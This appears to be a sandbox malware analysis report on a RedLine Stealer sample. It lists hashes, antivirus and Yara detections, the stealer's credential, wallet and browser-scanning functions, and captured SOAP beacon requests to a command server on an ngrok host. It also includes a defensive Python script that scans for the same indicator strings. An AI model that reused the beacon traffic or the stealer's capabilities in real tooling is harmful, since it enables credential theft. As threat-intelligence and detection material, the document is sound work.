Windows Analysis Report
kuEfaZxkiY.exe

Overview

General Information

Sample name: kuEfaZxkiY.exe (renamed because the original name is a hash value)
Original sample name: 117EEF8A227E6CE3646718D0ED6FB7B1.exe
Analysis ID: 1393953
MD5: 117eef8a227e6ce3646718d0ed6fb7b1
SHA1: db6e21bf637604aa0be4f73142a1b7447cc83553
SHA256: 80488bf5f30ea2398ff207b9045a0e230aff2d052ea56156a0e96b57784dc0e5
Tags: exe, RedLineStealer

Detection

RedLine
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • kuEfaZxkiY.exe (PID: 7080 cmdline: C:\Users\user\Desktop\kuEfaZxkiY.exe MD5: 117EEF8A227E6CE3646718D0ED6FB7B1)
    • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
No configs have been found
Source | Rule | Description | Author | Strings
kuEfaZxkiY.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
kuEfaZxkiY.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
kuEfaZxkiY.exe | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
      • 0x135ca:$a4: get_ScannedWallets
      • 0x12428:$a5: get_ScanTelegram
      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
      • 0x1106a:$a7: <Processes>k__BackingField
      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x1099e:$a9: <ScanFTP>k__BackingField
kuEfaZxkiY.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
      • 0x1048a:$u7: RunPE
      • 0x13b41:$u8: DownloadAndEx
      • 0x9130:$pat14: , CommandLine:
      • 0x13079:$v2_1: ListOfProcesses
      • 0x1068b:$v2_2: get_ScanVPN
      • 0x1072e:$v2_2: get_ScanFTP
      • 0x1141e:$v2_2: get_ScanDiscord
      • 0x1240c:$v2_2: get_ScanSteam
      • 0x12428:$v2_2: get_ScanTelegram
      • 0x124ce:$v2_2: get_ScanScreen
      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
      • 0x13509:$v2_2: get_ScanBrowsers
      • 0x135ca:$v2_2: get_ScannedWallets
      • 0x135f0:$v2_2: get_ScanWallets
      • 0x13610:$v2_3: GetArguments
      • 0x11cd9:$v2_4: VerifyUpdate
      • 0x165f2:$v2_4: VerifyUpdate
      • 0x139ca:$v2_5: VerifyScanRequest
      • 0x130c6:$v2_6: GetUpdates
      • 0x165d3:$v2_6: GetUpdates
Source | Rule | Description | Author | Strings
00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
Process Memory Space: kuEfaZxkiY.exe PID: 7080 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: kuEfaZxkiY.exe PID: 7080 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Source | Rule | Description | Author | Strings
0.0.kuEfaZxkiY.exe.860000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.0.kuEfaZxkiY.exe.860000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0.0.kuEfaZxkiY.exe.860000.0.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
0.0.kuEfaZxkiY.exe.860000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165f2:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165d3:$v2_6: GetUpdates
                  No Sigma rule has matched
                  No Snort rule has matched
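The three rule matches above (on the file, on the region dumped at 0x862000 and on the unpacked image) all hit the same .NET member names, so a first-pass triage can be built on those names alone, without either rule's body, which this report does not reproduce. The script below is an added example written for this page, not Joe Sandbox, Elastic or ditekSHen code: it searches a file or a memory dump for the names listed in the match tables and reports their offsets in the same form as the report. The indicator list is taken from the tables above; the hit threshold and the constructed sample bytes are assumptions. Two points worth knowing when reading the offsets: the memory-dump matches sit exactly 0x200 below the file offsets (0x133ca against 0x135ca), consistent with the dump starting at the mapped .text section rather than at the PE header, and a plain byte search only works because this build is neither packed nor string-obfuscated, which is why the memory-dump and unpacked-image scans matter for builds that are.

```python
"""String-based triage for RedLine Stealer builds.

Added example for this report; not Joe Sandbox, Elastic or ditekSHen code, and
not the body of either Yara rule matched above. It searches a file (or a memory
dump) for the .NET member names those rules matched on in this sample.
"""
from __future__ import annotations

import re
import sys

# Member names taken from the rule match tables in this report. The #Strings
# heap of a .NET assembly stores them as plain ASCII, so a byte search finds
# them in an unobfuscated build.
REDLINE_STRINGS = [
    b"get_ScanVPN", b"get_ScanFTP", b"get_ScanDiscord", b"get_ScanSteam",
    b"get_ScanTelegram", b"get_ScanScreen", b"get_ScanChromeBrowsersPaths",
    b"get_ScanGeckoBrowsersPaths", b"get_ScanBrowsers", b"get_ScannedWallets",
    b"get_ScanWallets", b"ListOfProcesses", b"GetArguments", b"VerifyUpdate",
    b"VerifyScanRequest", b"GetUpdates", b"RunPE", b"DownloadAndEx",
    b"<Processes>k__BackingField", b"<ScanFTP>k__BackingField",
    b"<GetWindowsVersion>g__HKLM_GetString|11_0",
]

# Assumption for this example: a single "GetUpdates" or "RunPE" occurs in
# plenty of benign software, so several distinct names must be present.
MIN_DISTINCT_HITS = 6


def find_indicators(data: bytes) -> dict[bytes, list[int]]:
    """Map each indicator found in data to every offset at which it occurs."""
    hits: dict[bytes, list[int]] = {}
    for needle in REDLINE_STRINGS:
        offsets = [m.start() for m in re.finditer(re.escape(needle), data)]
        if offsets:
            hits[needle] = offsets
    return hits


def is_redline_like(data: bytes) -> bool:
    """True when enough distinct indicators are present to justify a closer look."""
    return len(find_indicators(data)) >= MIN_DISTINCT_HITS


def format_hits(hits: dict[bytes, list[int]]) -> list[str]:
    """Render hits as 'offset: name' lines ordered by first occurrence, in the
    same style as the report's match tables."""
    lines = []
    for needle, offsets in sorted(hits.items(), key=lambda kv: kv[1][0]):
        extra = f" (+{len(offsets) - 1} more)" if len(offsets) > 1 else ""
        lines.append(f"{offsets[0]:#x}: {needle.decode()}{extra}")
    return lines


# Constructed stand-in for a sample: indicator names separated by NUL bytes,
# as they sit in a #Strings heap. These are not bytes from the real file.
CONSTRUCTED_SAMPLE = b"\x00".join([
    b"Mono.Cecil", b"get_ScanVPN", b"get_ScanFTP", b"get_ScanDiscord",
    b"get_ScanTelegram", b"get_ScannedWallets", b"VerifyUpdate",
    b"GetUpdates", b"<ScanFTP>k__BackingField", b"GetUpdates",
])


def main(argv: list[str]) -> int:
    # With a path argument, scan that file (a PE or a raw memory dump);
    # without one, scan the constructed sample so the script runs offline.
    data = open(argv[1], "rb").read() if len(argv) > 1 else CONSTRUCTED_SAMPLE
    hits = find_indicators(data)
    for line in format_hits(hits):
        print(line)
    verdict = "RedLine-like" if is_redline_like(data) else "not enough indicators"
    print(f"{len(hits)} distinct indicators: {verdict}")
    return 0 if is_redline_like(data) else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a process memory dump as well as the dropped file: for a packed build the on-disk scan returns nothing while the dump, like the 0x862000 region in this report, still carries every name.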


                  AV Detection

Source: kuEfaZxkiY.exe | Avira: detected
Source: http://0.tcp.in.ngrok.io:17383/ | Avira URL Cloud: Label: malware
Source: http://0.tcp.in.ngrok.io:17383 | Avira URL Cloud: Label: malware
Source: http://0.tcp.in.ngrok.io | Avira URL Cloud: Label: malware
Source: http://0.tcp.in.ngrok.io:17383/. | Avira URL Cloud: Label: malware
Source: 0.tcp.in.ngrok.io | Virustotal: Detection: 8%
Source: http://0.tcp.in.ngrok.io | Virustotal: Detection: 8%
Source: http://0.tcp.in.ngrok.io:17383/ | Virustotal: Detection: 8%
Source: http://0.tcp.in.ngrok.io:17383 | Virustotal: Detection: 8%
Source: http://0.tcp.in.ngrok.io:17383/. | Virustotal: Detection: 8%
Source: kuEfaZxkiY.exe | ReversingLabs: Detection: 86%
Source: kuEfaZxkiY.exe | Virustotal: Detection: 77%
Source: kuEfaZxkiY.exe | Joe Sandbox ML: detected
Source: kuEfaZxkiY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: kuEfaZxkiY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32d source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp

                  Networking

Source: unknown | Network traffic detected: HTTP traffic on 34 connections to port 17383, from source ports 49729-49734, 49738, 49740, 49742-49749 and 49751-49768
Source: global traffic | TCP traffic: 192.168.2.4:49729 -> 3.6.115.182:17383
Source: global traffic | HTTP traffic detected (21 of the 34 requests carry this exact head):
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
    Host: 0.tcp.in.ngrok.io:17383
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (the other 13 requests carry the same head with Accept-Encoding ahead of Host):
    POST / HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
    Accept-Encoding: gzip, deflate
    Host: 0.tcp.in.ngrok.io:17383
    Content-Length: 137
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 3.6.115.182
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: 0.tcp.in.ngrok.io
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: 0.tcp.in.ngrok.io:17383 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.tcp.in.ngrok.io
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.tcp.in.ngrok.io:17383
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.tcp.in.ngrok.io:17383/
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://0.tcp.in.ngrok.io:17383/.
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/0
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/8
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: kuEfaZxkiY.exe | String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: kuEfaZxkiY.exe | String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E64000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6D000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dashboard.ngrok.com
Source: kuEfaZxkiY.exe | String found in binary or memory: https://ipinfo.io/ip%appdata%

                  System Summary

                  Source: kuEfaZxkiY.exe, type: SAMPLE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: kuEfaZxkiY.exe, type: SAMPLE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: kuEfaZxkiY.exe PID: 7080, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Code function: 0_2_00F9E7B0
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Code function: 0_2_00F9DC90
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs kuEfaZxkiY.exe
                  Source: kuEfaZxkiY.exe, 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameImplosions.exe4 vs kuEfaZxkiY.exe
                  Source: kuEfaZxkiY.exe | Binary or memory string: OriginalFilenameImplosions.exe4 vs kuEfaZxkiY.exe
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\kuEfaZxkiY.exe | Section loaded: fwpuclnt.dll
                  Source: kuEfaZxkiY.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: kuEfaZxkiY.exe, type: SAMPLE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: kuEfaZxkiY.exe, type: SAMPLE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.0.kuEfaZxkiY.exe.860000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
